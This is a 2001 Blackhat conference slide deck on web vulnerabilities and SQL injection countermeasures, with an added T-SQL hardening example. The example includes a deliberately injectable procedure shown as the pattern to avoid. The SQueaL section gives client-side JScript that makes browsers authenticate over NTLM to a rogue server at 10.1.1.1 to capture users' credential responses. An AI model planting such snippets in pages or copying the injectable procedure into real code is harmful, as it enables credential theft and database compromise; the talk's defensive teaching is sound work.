Welcome to Blackhat! Blackhat Security Briefings Amsterdam 2001
Timothy M. Mullen, AnchorIS.Com, Inc.
Blackhat Amsterdam, 2001 Timothy M. Mullen, AnchorIS.Com; thor@hammerofgod.com

Web Vulnerability and SQL Injection Countermeasures
Securing your servers from the most insidious of attacks:
The demands of the global marketplace have made web development more complex than ever. With customer demands and competitive influences, the functions our applications must be capable of performing constantly push our development into new areas. Even with enterprise firewall solutions, hardened servers, and up-to-date web server software in place and properly configured, poor design methodology can leave our systems open to attack.

Session Overview
Part I:
∙ Vulnerabilities: Client-side HTML, URL Manipulation, SQL Injection
∙ Countermeasures: Input Validation, Data Sanitation, Variable Typing, Procedure Structure, Permissions and ACLs
Part II:
∙ Live Demos highlighting real-world sites with different issues, participant involvement and brainstorming
∙ SQueaL Demo (SQueaL is an NTLM-logging rogue SQL Server app)

Part I
Vulnerabilities
∙ Client-side HTML
∙ URL Manipulation
∙ SQL Injection
Countermeasures
∙ Implementation/Setup
∙ Data Sanitation
∙ Procedure Structure
∙ Input Validation
∙ Variable Typing
∙ Permissions and ACLs

Vulnerabilities – Lab Demos
Client-side HTML Issues
∙ Web Forms
∙ Input/Select controls
∙ Hidden Fields
URL Manipulation
∙ Editing the URL
∙ Session variables
∙ Cookies
SQL Injection
∙ The possibilities are endless!

Countermeasures – Lab Demos
Implementation and Setup
∙ ADODB Connection Strings and DSNs
∙ ODBC Error reporting
∙ Custom error pages

Countermeasures – Lab Demos
Input Validation
∙ Querystring count checking
∙ Data Type Validation
∙ Value/Length Checking
∙ Extents/Boundary Checking
∙ Host submission limits per unit of time

Countermeasures – Lab Demos
Data Sanitation
∙ REPLACE function
∙ RegExp function
∙ Custom functions / explicit declarations

Countermeasures – Lab Demos
Variable Typing
∙ Command object
∙ Parameter declaration
∙ Command type declaration
∙ Execute as methods

Countermeasures – Lab Demos
SQL Stored Procedure Structure
∙ Use stored procedures whenever possible
∙ Type cast variables
∙ Create and use Views as table sources
∙ Avoid “Select *” statements for performance as well as security
∙ sp_executesql procedure for ad hoc queries

Countermeasures – Lab Demos
Permissions and ACLs
∙ Open views, but lock down tables
∙ Use groups
∙ Lock down xp_cmdshell, xp_sendmail or remove
∙ SQL Service context
∙ Integrated/Mixed security

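As an added example (not code from the slides or from the author), the countermeasures on the Input Validation, Data Sanitation, Variable Typing, Procedure Structure and Permissions slides carried through in T-SQL for one author search in the pubs sample database that the deck's connection string names. The view, procedure and role names, the WEBSRV\WebAppUser login and the 1-40 / 1-500 limits are assumptions; the syntax is SQL Server 2012 or later (on the SQL Server 2000 of the deck's day the role statements were sp_addrole / sp_addrolemember, TOP took no variable and xp_cmdshell had no sp_configure switch). The ADO Command object on the web tier that would call usp_AuthorSearch with a stored-procedure command type and typed parameters is not shown here.

```sql
-- Added example (not from the slides): one hardened data-access path for the
-- pubs sample database, SQL Server 2012+ syntax. Object names, the login and
-- the numeric limits are assumptions.
USE pubs;
GO

-- "Create and use Views as table sources", "Avoid Select *": the web tier sees
-- only the columns it needs, never dbo.authors itself.
CREATE VIEW dbo.vw_AuthorsPublic
AS
    SELECT au_id, au_lname, au_fname, city, state
    FROM dbo.authors;
GO

-- The shape the deck warns against: an untyped input pasted into statement
-- text. Any quote character in @lname becomes part of the SQL, so the caller
-- shapes the statement. REPLACE(@lname, '''', '''''') (the "REPLACE function"
-- slide) narrows this but still leaves the value inside the text.
CREATE PROCEDURE dbo.usp_AuthorSearch_Weak
    @lname VARCHAR(8000)
AS
    EXEC ('SELECT au_id, au_lname, au_fname FROM dbo.authors '
        + 'WHERE au_lname LIKE ''' + @lname + '%''');
GO

-- "Type cast variables", "Value/Length Checking", "Extents/Boundary Checking",
-- "sp_executesql for ad hoc queries": every value is typed and bounded; the
-- only dynamic piece is an identifier drawn from a closed list.
CREATE PROCEDURE dbo.usp_AuthorSearch
    @lname   VARCHAR(40),            -- same type and size as authors.au_lname;
                                     -- longer input is truncated by the type
    @sortcol SYSNAME = N'au_lname',
    @maxrows INT     = 50
AS
BEGIN
    SET NOCOUNT ON;

    IF @lname IS NULL OR LEN(@lname) < 1
    BEGIN
        RAISERROR('lname must be 1-40 characters', 16, 1);
        RETURN 1;
    END;
    IF @maxrows < 1 OR @maxrows > 500
    BEGIN
        RAISERROR('maxrows must be between 1 and 500', 16, 1);
        RETURN 1;
    END;
    -- Identifiers cannot travel as parameters, so the sort column is checked
    -- against a fixed list and then bracket-quoted.
    IF @sortcol NOT IN (N'au_lname', N'au_fname', N'city', N'state')
    BEGIN
        RAISERROR('unsupported sort column', 16, 1);
        RETURN 1;
    END;

    -- REPLACE used for what it is good at: neutralising LIKE wildcards in the
    -- value ('[' first, so the brackets added afterwards are not re-escaped).
    DECLARE @pattern VARCHAR(200);
    SET @pattern = REPLACE(REPLACE(REPLACE(@lname, '[', '[[]'),
                                   '%', '[%]'), '_', '[_]') + '%';

    DECLARE @sql NVARCHAR(500);
    SET @sql = N'SELECT TOP (@n) au_id, au_lname, au_fname, city, state '
             + N'FROM dbo.vw_AuthorsPublic WHERE au_lname LIKE @pattern '
             + N'ORDER BY ' + QUOTENAME(@sortcol);

    -- The data values are passed as typed parameters; they never become text.
    EXEC sp_executesql @sql,
         N'@n INT, @pattern VARCHAR(200)',
         @n = @maxrows, @pattern = @pattern;
    RETURN 0;
END;
GO

-- Usage: pubs ships authors named Green, Greene and Gringlesby.
EXEC dbo.usp_AuthorSearch @lname = 'Gr', @sortcol = N'city', @maxrows = 10;
GO

-- "Open views, but lock down tables", "Use groups", "Integrated security":
-- the web application's Windows login is mapped to a role that may run the
-- procedure and read the view only. Because dbo owns table, view and
-- procedure, ownership chaining lets the role reach dbo.authors through them
-- while the DENY blocks any direct query against the table.
CREATE LOGIN [WEBSRV\WebAppUser] FROM WINDOWS;     -- assumed login name
CREATE USER WebAppUser FOR LOGIN [WEBSRV\WebAppUser];
CREATE ROLE role_WebApp;
ALTER ROLE role_WebApp ADD MEMBER WebAppUser;
GRANT EXECUTE ON dbo.usp_AuthorSearch TO role_WebApp;
GRANT SELECT  ON dbo.vw_AuthorsPublic TO role_WebApp;
DENY  SELECT, INSERT, UPDATE, DELETE ON dbo.authors TO role_WebApp;
GO

-- "Lock down xp_cmdshell or remove": switch it off instance-wide and make
-- sure public holds no grant on it should it ever be re-enabled.
USE master;
GO
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
REVOKE EXECUTE ON xp_cmdshell FROM public;
GO
```

The point of the layout is that the web login can only reach data through usp_AuthorSearch and vw_AuthorsPublic, so even a page that forgets its own input checks cannot turn a form field into statement text: the procedure's parameter types bound the values, sp_executesql keeps them out of the SQL string, and the role has no path to the base table or to xp_cmdshell.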
Web Vulnerability and SQL Injection Countermeasures
Part I Concluded – 15 Minute Break

Web Vulnerability and SQL Injection Countermeasures
Welcome Back!

Part II
Live Web Demos and Feedback
∙ Expose potentially insecure implementations of web applications
∙ Discuss potential vulnerabilities and exploits
∙ Mitigation and Prevention
SQueaL Demo: Grabbing NTLM responses from unsuspecting users

Web Vulnerabilities – Live Demos
Real-world web application issues and feedback

Web Vulnerabilities – Live Demos
SQueaL: NTLM-logging rogue SQL Server
∙ Linux server application based on DilDog’s “TalkNTLM” code
∙ Waits for a TCP/IP connection on 1433, and attempts to authenticate via NTLM
∙ Logs domain, username, and NTLM response

Web Vulnerabilities – Live Demos
SQueaL: Getting them to connect
∙ ADODB Connection (Lame)
    // client-side JScript; Integrated Security=SSPI makes the browser authenticate to the Data Source with the user's NTLM response
    conn = new ActiveXObject("ADODB.Connection");
    conn.ConnectionString = 'Provider=SQLOLEDB.1; Integrated Security=SSPI; Persist Security Info=False; Initial Catalog=pubs; Data Source=10.1.1.1; Network Library=dbnetlib';
    conn.Open();

Web Vulnerability and SQL Injection Countermeasures
SQueaL: Getting them to connect
∙ DBNETLIB (Not so lame)
    // same effect through the SQL Namespace object; Trusted_Connection=Yes selects NTLM
    ns = new ActiveXObject("SQLNS.SQLNamespace");
    ns.Initialize("Grabber", 2, "Server=10.1.1.1; Trusted_Connection=Yes; Network Library=dbnetlib.dll");

Web Vulnerability and SQL Injection Countermeasures
Closing Remarks

THANK YOU!
Additional Resources:
∙ http://www.hammerofgod.com
∙ mailto:thor@hammerofgod.com
∙ http://www.securityfocus.com
∙ http://www.sqlsecurity.com
∙ http://heap.nologin.net/aspsec.html
∙ http://security.devx.com/bestdefense/default.asp
∙ http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/database/database.asp